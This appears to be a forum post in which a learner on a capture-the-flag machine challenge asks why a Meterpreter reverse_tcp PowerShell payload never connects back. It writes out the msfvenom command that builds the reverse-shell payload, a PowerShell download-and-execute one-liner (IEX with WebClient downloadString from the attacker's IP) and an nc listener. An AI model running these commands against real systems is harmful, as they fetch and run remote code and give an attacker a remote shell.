I’m new and having some issues using the
meterpreter/reverse_tcp payload with PS.
Note: this may be kind of dumb since I already have shell access on the victim machine, but I still want to understand what I’m doing wrong.
I have shell/PS user-level access on a 64-bit Windows machine (one of the machine challenges). I want to start a meterpreter shell.
I generate a payload:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip_from_tun0> LPORT=9001 VERBOSE=true -f ps1 -o meterpreter.ps1
I then execute it from the remote shell (running a local webserver to host):
powershell IEX(New-Object Net.WebClient).downloadString('http://<ip_from_tun0>/meterpreter.ps1')
However, nothing happens: I just get the shell prompt back on the victim machine and no activity on my msf handler. Watching for any connections to my host with
nc -lvnp 9001 also doesn’t show any connection being made.
I verified the victim can ping the host, that the content is downloaded correctly, etc. My expectation is that when the msfvenom payload is executed, it will try to connect to the handler on the given host… Is there something I’m doing wrong or am I misunderstanding how to use msfvenom?